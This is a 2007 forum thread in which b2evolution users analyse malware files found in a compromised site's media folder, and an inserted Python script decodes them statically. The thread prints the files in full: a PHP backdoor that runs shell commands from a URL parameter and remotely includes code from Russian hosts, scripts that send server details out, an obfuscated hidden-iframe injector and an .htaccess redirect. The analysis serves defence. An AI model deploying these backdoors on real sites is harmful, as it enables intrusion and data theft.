1 Jul 18, 2007 00:46

My b2evolution Version: 0.9.x

I was just going through an old and inactive site with a friend of mine, and we located the following files inside the /media/ directory of his site:

index.html
containing the following code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Media Files</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<p>This folder is destined to receive images and other media files you upload from within b2evolution. </p>
<a href="http://ccf.thehehrs.org/images/articles/business_time_management.asp" class=giepoaytr title="business time management">business time management</a>
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);
</script>
</body>
</html>

The URL appearing in that page (above) is NOT the URL of the site in question.

date.php
containing the following code:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

include.php
containing the following code:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

report.php
containing the following:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : 
$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : 
$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : 
$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; 
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} 
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

time.php
containing the following code:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : 
$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : 
$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : 
$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; 
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} 
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

and there was also an .htaccess file in the media folder, containing the following:

Options -MultiViews
ErrorDocument 404 //blog/media/report.php
Options -MultiViews
ErrorDocument 404 //media/time.php

The contents of the first two blocks are identical, and the contents of the second two blocks are identical.
There are no leading PHP tags in the last two blocks.
Also, I have added line-breaks in the last two blocks.
The last two blocks, as they were on the site, were one long string of code with no line breaks...

Does anyone here know what those files might have been doing?
Does this appear to have been some kind of exploit?
All instances of b2evo were removed from the domain about 6 months ago,
but does this appear to have been some kind of attempt to compromise the site?

jj.

2 Jul 18, 2007 01:35

Yes your site was hacked, but probably not b2evo. It looks like they found the media folder.
The permissions of this folder are set very low, in order to allow posters to upload to this folder.

edit:
The JavaScript in index.html unscrambles itself then it reads:

<div style="visibility: hidden; position:absolute; left: 1; top:1">
<iframe src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0
hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no>
</iframe></div>


This is a one by one iframe placed in the left top of the screen. It calls a Russian site.

edit 2:
I have a little more difficulty with the php.
If the files exist, the hacker can call them and send a few arguments with them.
It looks like the caller must identify himself with l=??? & p=???; p is the password (md5 protected).
He then sets a base url to call home:

@include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")


This reads:

@include_once(http://bis.iframe.ru/master.php?r_addr=)

In the other files he tries to gather as much information from the server
as he can get from PHP. He then sends it back to his home site
through a page call.
This is the call it makes:
a) if isset the iframe.ru address (that is, if he successfully 'logged in' through the first two files):

http://bis.iframe.ru/master.php?r_addr=$_SERVER["HTTP_HOST"]$_SERVER["SERVER_NAME"]etc


Have a look in the php manual about the variables.
It's about things like host name (url) and the server version
b) if the 'login' was not successful, it sends the information to:

http://user9.mshtml.ru

I didn't find anything to really worry about, but I might have missed something.
I suggest you change all passwords from the host.
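The decoding Afwas did by hand above can be done offline, without ever running the dropped files. The following is an added example, not code from this thread or from b2evolution: it copies the obfuscated strings from the files jibberjab posted (the index.html script, date.php, the two include lines of report.php, and the .htaccess), undoes the character-shift loop and the base64_decode() literals with plain string operations, and then runs a handful of pattern rules over each sample. The rule names, the function names and the constants such as REPORT_PHP_EXCERPT are my own choices and not anything from the page.

```python
"""
Static triage of the /media/ dropper files quoted in this thread.

Added example; not code from the thread or from b2evolution. The sample
strings are copied from the posted files, everything else (rule names,
functions) is the example author's own. Nothing here executes the samples.
"""
import base64
import re
from typing import Dict, List, Optional

# --- samples, copied verbatim from the files posted in the thread -----------
INDEX_HTML_SCRIPT = (
    "var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A"
    "?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3"
    "#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA'"
    ",t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}"
    "document.write(h);"
)
DATE_PHP = '''<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>'''
REPORT_PHP_EXCERPT = (  # the two include() lines of report.php / time.php
    'if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} '
    'else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>'
)
HTACCESS = (
    "Options -MultiViews\nErrorDocument 404 //blog/media/report.php\n"
    "Options -MultiViews\nErrorDocument 404 //media/time.php\n"
)

# --- decoders ---------------------------------------------------------------
def shift_decode(s: str, shift: int) -> str:
    """Undo a charCodeAt(i) - shift obfuscation with plain string work, no eval."""
    return "".join(chr(ord(c) - shift) for c in s)

# Matches the k='...' literal and the constant subtracted in the decode loop.
SHIFT_LOOP = re.compile(
    r"var\s+k='([^']*)'.*?String\.fromCharCode\([^)]*charCodeAt\([^)]*\)\s*-\s*(\d+)\)", re.S)

def decode_shifted_js(script: str) -> Optional[str]:
    """Return the markup the script would document.write(), or None if no loop is found."""
    m = SHIFT_LOOP.search(script)
    return shift_decode(m.group(1), int(m.group(2))) if m else None

B64_LITERAL = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')

def decode_b64_literals(src: str) -> List[str]:
    """Statically decode every base64_decode("...") literal, in source order."""
    out = []
    for m in B64_LITERAL.finditer(src):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("latin-1"))
        except ValueError:
            out.append("<undecodable:%s>" % m.group(1))
    return out

# --- pattern rules (hypothetical names, chosen for this example) -------------
RULES = [
    ("remote-include", re.compile(r'\b(?:include|include_once|require|require_once)\s*\(\s*base64_decode\(')),
    ("exec-from-request", re.compile(r'\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST)\[')),
    ("backtick-exec", re.compile(r'`[^`\n]+`')),
    ("charcode-shift-loop", SHIFT_LOOP),
    ("error-reporting-off", re.compile(r'error_reporting\s*\(\s*0\s*\)')),
    ("404-handler-is-php", re.compile(r'^\s*ErrorDocument\s+404\s+\S+\.php\b', re.M)),
]

def triage(name: str, content: str) -> Dict[str, object]:
    """Rule labels that fire on one file, plus every string we could decode from it."""
    hits = [label for label, rx in RULES if rx.search(content)]
    decoded = decode_b64_literals(content)
    markup = decode_shifted_js(content)
    if markup:
        decoded.append(markup)
    return {"file": name, "findings": hits, "decoded": decoded}

if __name__ == "__main__":
    for name, body in [("index.html", INDEX_HTML_SCRIPT), ("date.php", DATE_PHP),
                       ("report.php", REPORT_PHP_EXCERPT), (".htaccess", HTACCESS)]:
        r = triage(name, body)
        print(name, r["findings"])
        for s in r["decoded"]:
            print("   decoded:", s)
```

Run stand-alone it prints, per file, which rules fired and what the literals decode to: the index.html script yields the hidden 1x1 iframe to user19.iframe.ru, date.php decodes to the bis.iframe.ru/master.php?r_addr= call-home URL and trips the remote-include, exec-from-request and backtick rules, and the .htaccess is flagged because both ErrorDocument 404 handlers point at a .php file in the media folder, which is how a request for any missing file reaches report.php or time.php.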

3 Jul 18, 2007 05:46

Yeah, he's already done that. The thing is that the files were dated over 6 months ago, and there haven't been any issues with his hosting account, so maybe the hacker wasn't able to learn anything useful from those scripts.

How would he have uploaded files into that folder in the first place? This was, apparently, a single-user blog.

I'm wondering now, for my own installation, are there any better ways to protect the /media/ folder, via .htaccess perhaps? If the folder has to be 755 in order for users to upload into it and for thumbnails to display in the filemanager, etc, is there anything in an .htaccess that could prevent *.php files from being run at all from that folder? Maybe someone with some strong .htaccess skills could chime in.

jj.

4 Jul 18, 2007 05:55

My guess is that he knows some severe flaws in (older) server configurations
and he needs info to establish if you are a potential victim.

5 Jul 18, 2007 23:02

Afwas, you know your stuff; everything was spot on :)

I'm also going with the idea that somewhere within b2evolution there is something that sends a form request, or at least a redirect, to one of those bad media files.

jibberjab, if you want to "protect your media folder" as well as your blog, be sure to upgrade. 0.9 is a dead (or close to it) version.
